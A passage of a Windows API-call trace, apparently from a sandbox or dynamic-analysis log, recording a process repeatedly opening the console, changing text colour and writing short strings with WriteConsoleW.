hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x510eaa0 | out: lpConsoleScreenBufferInfo=0x510eaa0) returned 1 [0044.341] GetLastError () returned 0xcb [0044.341] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1 [0044.341] GetLastError () returned 0xcb [0044.341] CloseHandle (hObject=0x3b) returned 1 [0044.341] GetLastError () returned 0xcb [0044.344] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0044.344] GetLastError () returned 0xcb [0044.344] GetConsoleMode (in: hConsoleHandle=0x3b, lpMode=0x510eaec | out: lpMode=0x510eaec) returned 1 [0044.344] GetLastError () returned 0xcb [0044.344] WriteConsoleW (in: hConsoleOutput=0x3b, lpBuffer=0x254987c*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x510eaec, lpReserved=0x0 | out: lpBuffer=0x254987c*, lpNumberOfCharsWritten=0x510eaec*=0x10) returned 1 [0044.344] GetLastError () returned 0xcb [0044.344] CloseHandle (hObject=0x3b) returned 1 [0044.344] GetLastError () returned 0xcb [0044.346] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0044.347] GetLastError () returned 0xcb [0044.347] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x510ea9c | out: lpConsoleScreenBufferInfo=0x510ea9c) returned 1 [0044.347] GetLastError () returned 0xcb [0044.347] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1 [0044.347] GetLastError () returned 0xcb [0044.347] CloseHandle (hObject=0x3b) returned 1 [0044.347] GetLastError () returned 0xcb [0044.350] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0044.350] GetLastError () returned 0xcb [0044.350] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x510ea9c | out: lpConsoleScreenBufferInfo=0x510ea9c) returned 1 [0044.350] GetLastError () returned 0xcb [0044.350] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1 [0044.350] GetLastError () returned 0xcb [0044.350] CloseHandle (hObject=0x3b) returned 1 [0044.350] GetLastError () returned 0xcb [0044.352] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0044.353] GetLastError () returned 0xcb [0044.353] GetConsoleMode (in: hConsoleHandle=0x3b, lpMode=0x510eb2c | out: lpMode=0x510eb2c) returned 1 [0044.353] GetLastError () returned 0xcb [0044.353] WriteConsoleW (in: hConsoleOutput=0x3b, lpBuffer=0x1df9b74*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x510eb2c, lpReserved=0x0 | out: lpBuffer=0x1df9b74*, lpNumberOfCharsWritten=0x510eb2c*=0x1) returned 1 [0044.353] GetLastError () returned 0xcb [0044.353] CloseHandle (hObject=0x3b) returned 1 [0044.353] GetLastError () returned 0xcb [0044.355] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0044.355] GetLastError () returned 0xcb [0044.355] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x510eaf8 | out: lpConsoleScreenBufferInfo=0x510eaf8) returned 1 [0044.356] GetLastError () returned 0xcb [0044.356] GetConsoleOutputCP () returned 0x1b5 [0044.356] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.356] GetLastError () returned 0xcb [0044.358] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f [0044.358] GetLastError () returned 0xcb [0044.358] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3f, lpConsoleScreenBufferInfo=0x510ea98 | out: lpConsoleScreenBufferInfo=0x510ea98) returned 1 [0044.358] GetLastError () returned 0xcb [0044.360] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43 [0044.360] GetLastError () returned 0xcb [0044.360] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x43, lpConsoleScreenBufferInfo=0x510ea98 | out: lpConsoleScreenBufferInfo=0x510ea98) returned 1 [0044.360] GetLastError () returned 0xcb [0044.362] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0044.362] GetLastError () returned 0xcb [0044.362] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x510eaa0 | out: lpConsoleScreenBufferInfo=0x510eaa0) returned 1 [0044.362] GetLastError () returned 0xcb [0044.362] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1 [0044.363] GetLastError () returned 0xcb [0044.363] CloseHandle (hObject=0x47) returned 1 [0044.363] GetLastError () returned 0xcb [0044.365] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0044.365] GetLastError () returned 0xcb [0044.365] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x510eaa0 | out: lpConsoleScreenBufferInfo=0x510eaa0) returned 1 [0044.365] GetLastError () returned 0xcb [0044.365] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1 [0044.365] GetLastError () returned 0xcb [0044.365] CloseHandle (hObject=0x47) returned 1 [0044.366] GetLastError () returned 0xcb [0044.368] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0044.368] GetLastError () returned 0xcb [0044.368] GetConsoleMode (in: hConsoleHandle=0x47, lpMode=0x510eaec | out: lpMode=0x510eaec) returned 1 [0044.368] GetLastError () returned 0xcb [0044.368] WriteConsoleW (in: hConsoleOutput=0x47, lpBuffer=0x2549c64*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x510eaec, lpReserved=0x0 | out: lpBuffer=0x2549c64*, lpNumberOfCharsWritten=0x510eaec*=0x4f) returned 1 [0044.368] GetLastError () returned 0xcb [0044.368] CloseHandle (hObject=0x47) returned 1 [0044.368] GetLastError () returned 0xcb [0044.370] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0044.370] GetLastError () returned 0xcb [0044.370] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x510ea9c | out: lpConsoleScreenBufferInfo=0x510ea9c) returned 1 [0044.370] GetLastError () returned 0xcb [0044.371] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1 [0044.371] GetLastError () returned 0xcb [0044.371] CloseHandle (hObject=0x47) returned 1 [0044.371] GetLastError () returned 0xcb [0044.373] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0044.373] GetLastError () returned 0xcb [0044.373] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x510ea9c | out: lpConsoleScreenBufferInfo=0x510ea9c) returned 1 [0044.373] GetLastError () returned 0xcb [0044.373] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1 [0044.373] GetLastError () returned 0xcb [0044.373] CloseHandle (hObject=0x47) returned 1 [0044.373] GetLastError () returned 0xcb [0044.375] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0044.376] GetLastError () returned 0xcb [0044.376] GetConsoleMode (in: hConsoleHandle=0x47, lpMode=0x510eb2c | out: lpMode=0x510eb2c) returned 1 [0044.376] GetLastError () returned 0xcb [0044.376] WriteConsoleW (in: hConsoleOutput=0x47, lpBuffer=0x1df9b74*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x510eb2c, lpReserved=0x0 | out: lpBuffer=0x1df9b74*, lpNumberOfCharsWritten=0x510eb2c*=0x1) returned 1 [0044.376] GetLastError () returned 0xcb [0044.376] CloseHandle (hObject=0x47) returned 1 [0044.376] GetLastError () returned 0xcb [0044.378] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0044.378] GetLastError () returned 0xcb [0044.378] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x510eaf8 | out: lpConsoleScreenBufferInfo=0x510eaf8) returned 1 [0044.378] GetLastError () returned 0xcb [0044.379] GetConsoleOutputCP () returned 0x1b5 [0044.379] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.379] GetLastError () returned 0xcb [0044.381] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4b [0044.381] GetLastError () returned 0xcb [0044.381] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4b, lpConsoleScreenBufferInfo=0x510ea98 | out: lpConsoleScreenBufferInfo=0x510ea98) returned 1 [0044.381] GetLastError () returned 0xcb [0044.383] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f [0044.383] GetLastError () returned 0xcb [0044.383] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4f, lpConsoleScreenBufferInfo=0x510ea98 | out: lpConsoleScreenBufferInfo=0x510ea98) returned 1 [0044.383] GetLastError () returned 0xcb [0044.385] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0044.385] GetLastError () returned 0xcb [0044.385] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x510eaa0 | out: lpConsoleScreenBufferInfo=0x510eaa0) returned 1 [0044.385] GetLastError () returned 0xcb [0044.385] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1 [0044.386] GetLastError () returned 0xcb [0044.386] CloseHandle (hObject=0x53) returned 1 [0044.386] GetLastError () returned 0xcb [0044.388] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0044.388] GetLastError () returned 0xcb [0044.388] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x510eaa0 | out: lpConsoleScreenBufferInfo=0x510eaa0) returned 1 [0044.388] GetLastError () returned 0xcb [0044.388] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1 [0044.388] GetLastError () returned 0xcb [0044.388] CloseHandle (hObject=0x53) returned 1 [0044.389] GetLastError () returned 0xcb [0044.390] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0044.391] GetLastError () returned 0xcb [0044.391] GetConsoleMode (in: hConsoleHandle=0x53, lpMode=0x510eaec | out: lpMode=0x510eaec) returned 1 [0044.391] GetLastError () returned 0xcb [0044.391] WriteConsoleW (in: hConsoleOutput=0x53, lpBuffer=0x254a228*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x510eaec, lpReserved=0x0 | out: lpBuffer=0x254a228*, lpNumberOfCharsWritten=0x510eaec*=0x4f) returned 1 [0044.391] GetLastError () returned 0xcb [0044.391] CloseHandle (hObject=0x53) returned 1 [0044.391] GetLastError () returned 0xcb [0044.394] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0044.394] GetLastError () returned 0xcb [0044.394] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x510ea9c | out: lpConsoleScreenBufferInfo=0x510ea9c) returned 1 [0044.394] GetLastError () returned 0xcb [0044.394] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1 [0044.394] GetLastError () returned 0xcb [0044.395] CloseHandle (hObject=0x53) returned 1 [0044.395] GetLastError () returned 0xcb [0044.397] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0044.397] GetLastError () returned 0xcb [0044.397] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x510ea9c | out: lpConsoleScreenBufferInfo=0x510ea9c) returned 1 [0044.398] GetLastError () returned 0xcb [0044.398] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1 [0044.398] GetLastError () returned 0xcb [0044.398] CloseHandle (hObject=0x53) returned 1 [0044.398] GetLastError () returned 0xcb [0044.400] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0044.400] GetLastError () returned 0xcb [0044.400] GetConsoleMode (in: hConsoleHandle=0x53, lpMode=0x510eb2c | out: lpMode=0x510eb2c) returned 1 [0044.400] GetLastError () returned 0xcb [0044.400] WriteConsoleW (in: hConsoleOutput=0x53, lpBuffer=0x1df9b74*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x510eb2c, lpReserved=0x0 | out: lpBuffer=0x1df9b74*, lpNumberOfCharsWritten=0x510eb2c*=0x1) returned 1 [0044.401] GetLastError () returned 0xcb [0044.401] CloseHandle (hObject=0x53) returned 1 [0044.401] GetLastError () returned 0xcb [0044.403] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0044.403] GetLastError () returned 0xcb [0044.403] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x510eaf8 | out: lpConsoleScreenBufferInfo=0x510eaf8) returned 1 [0044.403] GetLastError () returned 0xcb [0044.403] GetConsoleOutputCP () returned 0x1b5 [0044.403] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.403] GetLastError () returned 0xcb [0044.405] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x57 [0044.405] GetLastError () returned 0xcb [0044.405] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x57, lpConsoleScreenBufferInfo=0x510ea98 | out: lpConsoleScreenBufferInfo=0x510ea98) returned 1 [0044.405] GetLastError () returned 0xcb [0044.407] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b [0044.408] GetLastError () returned 0xcb [0044.408] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5b, lpConsoleScreenBufferInfo=0x510ea98 | out: lpConsoleScreenBufferInfo=0x510ea98) returned 1 [0044.408] GetLastError () returned 0xcb [0044.410] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0044.410] GetLastError () returned 0xcb [0044.410] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x510eaa0 | out: lpConsoleScreenBufferInfo=0x510eaa0) returned 1 [0044.410] GetLastError () returned 0xcb [0044.410] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1 [0044.410] GetLastError () returned 0xcb [0044.410] CloseHandle (hObject=0x5f) returned 1 [0044.410] GetLastError () returned 0xcb [0044.412] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0044.412] GetLastError () returned 0xcb [0044.412] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x510eaa0 | out: lpConsoleScreenBufferInfo=0x510eaa0) returned 1 [0044.413] GetLastError () returned 0xcb [0044.413] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1 [0044.413] GetLastError () returned 0xcb [0044.413] CloseHandle (hObject=0x5f) returned 1 [0044.413] GetLastError () returned 0xcb [0044.415] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0044.415] GetLastError () returned 0xcb [0044.415] GetConsoleMode (in: hConsoleHandle=0x5f, lpMode=0x510eaec | out: lpMode=0x510eaec) returned 1 [0044.415] GetLastError () returned 0xcb [0044.415] WriteConsoleW (in: hConsoleOutput=0x5f, lpBuffer=0x254a758*, nNumberOfCharsToWrite=0x30, lpNumberOfCharsWritten=0x510eaec, lpReserved=0x0 | out: lpBuffer=0x254a758*, lpNumberOfCharsWritten=0x510eaec*=0x30) returned 1 [0044.415] GetLastError () returned 0xcb [0044.415] CloseHandle (hObject=0x5f) returned 1 [0044.416] GetLastError () returned 0xcb [0044.417] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0044.418] GetLastError () returned 0xcb [0044.418] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x510ea9c | out: lpConsoleScreenBufferInfo=0x510ea9c) returned 1 [0044.418] GetLastError () returned 0xcb [0044.418] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1 [0044.418] GetLastError () returned 0xcb [0044.418] CloseHandle (hObject=0x5f) returned 1 [0044.418] GetLastError () returned 0xcb [0044.420] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0044.420] GetLastError () returned 0xcb [0044.420] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x510ea9c | out: lpConsoleScreenBufferInfo=0x510ea9c) returned 1 [0044.420] GetLastError () returned 0xcb [0044.420] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1 [0044.421] GetLastError () returned 0xcb [0044.421] CloseHandle (hObject=0x5f) returned 1 [0044.421] GetLastError () returned 0xcb [0044.423] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0044.423] GetLastError () returned 0xcb [0044.423] GetConsoleMode (in: hConsoleHandle=0x5f, lpMode=0x510eb2c | out: lpMode=0x510eb2c) returned 1 [0044.423] GetLastError () returned 0xcb [0044.423] WriteConsoleW (in: hConsoleOutput=0x5f, lpBuffer=0x1df9b74*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x510eb2c, lpReserved=0x0 | out: lpBuffer=0x1df9b74*, lpNumberOfCharsWritten=0x510eb2c*=0x1) returned 1 [0044.423] GetLastError () returned 0xcb [0044.423] CloseHandle (hObject=0x5f) returned 1 [0044.423] GetLastError () returned 0xcb [0044.425] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f [0044.426] GetLastError () returned 0xcb [0044.426] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5f, lpConsoleScreenBufferInfo=0x510eaf8 | out: lpConsoleScreenBufferInfo=0x510eaf8) returned 1 [0044.426] GetLastError () returned 0xcb [0044.426] GetConsoleOutputCP () returned 0x1b5 [0044.426] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.426] GetLastError () returned 0xcb [0044.428] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x63 [0044.428] GetLastError () returned 0xcb [0044.428] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x63, lpConsoleScreenBufferInfo=0x510ea98 | out: lpConsoleScreenBufferInfo=0x510ea98) returned 1 [0044.428] GetLastError () returned 0xcb [0044.430] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x67 [0044.431] GetLastError () returned 0xcb [0044.431] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x67, lpConsoleScreenBufferInfo=0x510ea98 | out: lpConsoleScreenBufferInfo=0x510ea98) returned 1 [0044.431] GetLastError () returned 0xcb [0044.433] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0044.433] GetLastError () returned 0xcb [0044.433] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x510eaa0 | out: lpConsoleScreenBufferInfo=0x510eaa0) returned 1 [0044.433] GetLastError () returned 0xcb [0044.433] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1 [0044.433] GetLastError () returned 0xcb [0044.433] CloseHandle (hObject=0x6b) returned 1 [0044.433] GetLastError () returned 0xcb [0044.435] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0044.436] GetLastError () returned 0xcb [0044.436] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x510eaa0 | out: lpConsoleScreenBufferInfo=0x510eaa0) returned 1 [0044.436] GetLastError () returned 0xcb [0044.436] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1 [0044.436] GetLastError () returned 0xcb [0044.436] CloseHandle (hObject=0x6b) returned 1 [0044.436] GetLastError () returned 0xcb [0044.438] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0044.438] GetLastError () returned 0xcb [0044.438] GetConsoleMode (in: hConsoleHandle=0x6b, lpMode=0x510eaec | out: lpMode=0x510eaec) returned 1 [0044.438] GetLastError () returned 0xcb [0044.438] WriteConsoleW (in: hConsoleOutput=0x6b, lpBuffer=0x254ac20*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x510eaec, lpReserved=0x0 | out: lpBuffer=0x254ac20*, lpNumberOfCharsWritten=0x510eaec*=0x4f) returned 1 [0044.438] GetLastError () returned 0xcb [0044.439] CloseHandle (hObject=0x6b) returned 1 [0044.439] GetLastError () returned 0xcb [0044.441] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0044.441] GetLastError () returned 0xcb [0044.441] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x510ea9c | out: lpConsoleScreenBufferInfo=0x510ea9c) returned 1 [0044.441] GetLastError () returned 0xcb [0044.441] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1 [0044.441] GetLastError () returned 0xcb [0044.441] CloseHandle (hObject=0x6b) returned 1 [0044.441] GetLastError () returned 0xcb [0044.443] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0044.444] GetLastError () returned 0xcb [0044.444] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x510ea9c | out: lpConsoleScreenBufferInfo=0x510ea9c) returned 1 [0044.444] GetLastError () returned 0xcb [0044.444] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1 [0044.444] GetLastError () returned 0xcb [0044.444] CloseHandle (hObject=0x6b) returned 1 [0044.444] GetLastError () returned 0xcb [0044.446] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0044.446] GetLastError () returned 0xcb [0044.446] GetConsoleMode (in: hConsoleHandle=0x6b, lpMode=0x510eb2c | out: lpMode=0x510eb2c) returned 1 [0044.446] GetLastError () returned 0xcb [0044.447] WriteConsoleW (in: hConsoleOutput=0x6b, lpBuffer=0x1df9b74*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x510eb2c, lpReserved=0x0 | out: lpBuffer=0x1df9b74*, lpNumberOfCharsWritten=0x510eb2c*=0x1) returned 1 [0044.447] GetLastError () returned 0xcb [0044.447] CloseHandle (hObject=0x6b) returned 1 [0044.447] GetLastError () returned 0xcb [0044.449] CreateFileW 